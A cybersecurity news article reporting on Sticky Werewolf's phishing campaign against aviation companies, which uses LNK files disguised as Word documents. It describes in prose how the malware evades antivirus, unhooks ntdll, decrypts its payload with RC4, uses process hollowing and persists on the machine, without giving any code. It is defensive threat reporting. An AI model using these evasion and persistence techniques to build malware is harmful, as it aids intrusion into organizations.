Tuesday, May 6, 2025
HomeCyber AttackSticky Werewolf Weaponizing LNK Files Group Attacking To Attack Organizations

Sticky Werewolf Weaponizing LNK Files Group Attacking To Attack Organizations

Published on

SIEM as a Service

Follow Us on Google News

Sticky Werewolf, a cyber threat group, has shifted its targeting strategy from sending phishing emails with download links to malicious files to using archive attachments containing LNK files, which act as shortcuts to malicious executables hosted on WebDAV servers. 

When a user clicks on the LNK, a batch script is triggered, which in turn launches an AutoIt script designed to deliver the final payload, which bypasses traditional phishing tactics and injects malware directly if the user executes the LNK file. 

Infection Chain

A cyberespionage group, Sticky Werewolf, is targeting the aviation industry with phishing emails disguised as business invitations from a legitimate Russian aerospace company, AO OKB Kristall, where the emails contain an archive attachment with two malicious LNK files masquerading as DOCX documents and a decoy PDF file.

- Advertisement - Google News

With ANYRUN You can Analyze any URL, Files & Email for Malicious Activity : Start your Analysis

Clicking the LNK files triggers a Batch script that launches an AutoIt script to ultimately deliver the final payload, which is a significant shift from Sticky Werewolf’s previous tactics of using links to download malware directly from file-sharing platforms. 

Phishing Email

A phishing email with a decoy PDF attachment targets enterprises related to Russian helicopters, as the PDF mentions a video conference and references two malicious LNK files disguised as meeting documents. 

Clicking the LNK files triggers an NSIS self-extracting archive, a variant of the CypherIT crypter, to download and run a malicious executable from a network share.

The extracted files land in the Internet Explorer temporary files directory, and then a batch script is executed. 

Pdf

Two malicious LNK files, disguised as Word documents, target users, and clicking either LNK triggers a sequence of events, as first, the LNK adds a registry entry to run a compromised WINWORD.exe on login persistently. 

Then, it displays a decoy error message to distract the user. The first LNK copies a potentially deceptive image file, while the second LNK behaves similarly, launching a malicious WINWORD.exe. 

Batch Script

A batch script within the LNK delays execution if specific antivirus processes are running and potentially renames files to evade detection.

Finally, the script combines a legitimate AutoIt executable with a malicious script and executes them. 

Processes monitored by the Batch script and their corresponding security vendors. 

This malicious AutoIT script aims to evade detection, establish persistence, and check for signatures of security environments and debuggers. It injects a clean copy of ntdll.dll to bypass hooking, effectively unhooking any monitoring attempts. 

Persistence is achieved through scheduled tasks or startup directory modifications, where the payload, hidden within the script, is decrypted using a two-stage RC4 process with a user-defined passphrase. 

According to Morphisec, the decrypted and decompressed payload is injected via process hollowing into a legitimate AutoIT process, making it harder to detect.

Looking for Full Data Breach Protection? Try Cynet's All-in-One Cybersecurity Platform for MSPs: Try Free Demo 

Aman Mishra
Aman Mishra
Aman Mishra is a Security and privacy Reporter covering various data breach, cyber crime, malware, & vulnerability.

Latest articles

Hackers Exploit Fake Chrome Error Pages to Deploy Malicious Scripts on Windows Users

Hackers are leveraging a sophisticated social engineering technique dubbed "ClickFix" to trick Windows users...

New ClickFix Attack Imitates Ministry of Defence Website to Target Windows & Linux Systems

A newly identified cyberattack campaign has surfaced, leveraging the recognizable branding of India's Ministry...

Threat Actor Evades SentinelOne EDR to Deploy Babuk Ransomware

Aon’s Stroz Friedberg Incident Response Services has uncovered a method used by a threat...

Samsung MagicINFO 9 Server Vulnerability Actively Exploited in the Wild

A critical security vulnerability in the Samsung MagicINFO 9 Server has come under active...

Resilience at Scale

Why Application Security is Non-Negotiable

The resilience of your digital infrastructure directly impacts your ability to scale. And yet, application security remains a critical weak link for most organizations.

Application Security is no longer just a defensive play—it’s the cornerstone of cyber resilience and sustainable growth. In this webinar, Karthik Krishnamoorthy (CTO of Indusface) and Phani Deepak Akella (VP of Marketing – Indusface), will share how AI-powered application security can help organizations build resilience by

Discussion points


Protecting at internet scale using AI and behavioral-based DDoS & bot mitigation.
Autonomously discovering external assets and remediating vulnerabilities within 72 hours, enabling secure, confident scaling.
Ensuring 100% application availability through platforms architected for failure resilience.
Eliminating silos with real-time correlation between attack surface and active threats for rapid, accurate mitigation

More like this

New ClickFix Attack Imitates Ministry of Defence Website to Target Windows & Linux Systems

A newly identified cyberattack campaign has surfaced, leveraging the recognizable branding of India's Ministry...

Hackers Exploit 21 Apps to Take Full Control of E-Commerce Servers

Cybersecurity firm Sansec has uncovered a sophisticated supply chain attack that has compromised 21...

Hackers Target HR Departments With Fake Resumes to Spread More_eggs Malware

The financially motivated threat group Venom Spider, also tracked as TA4557, has shifted its...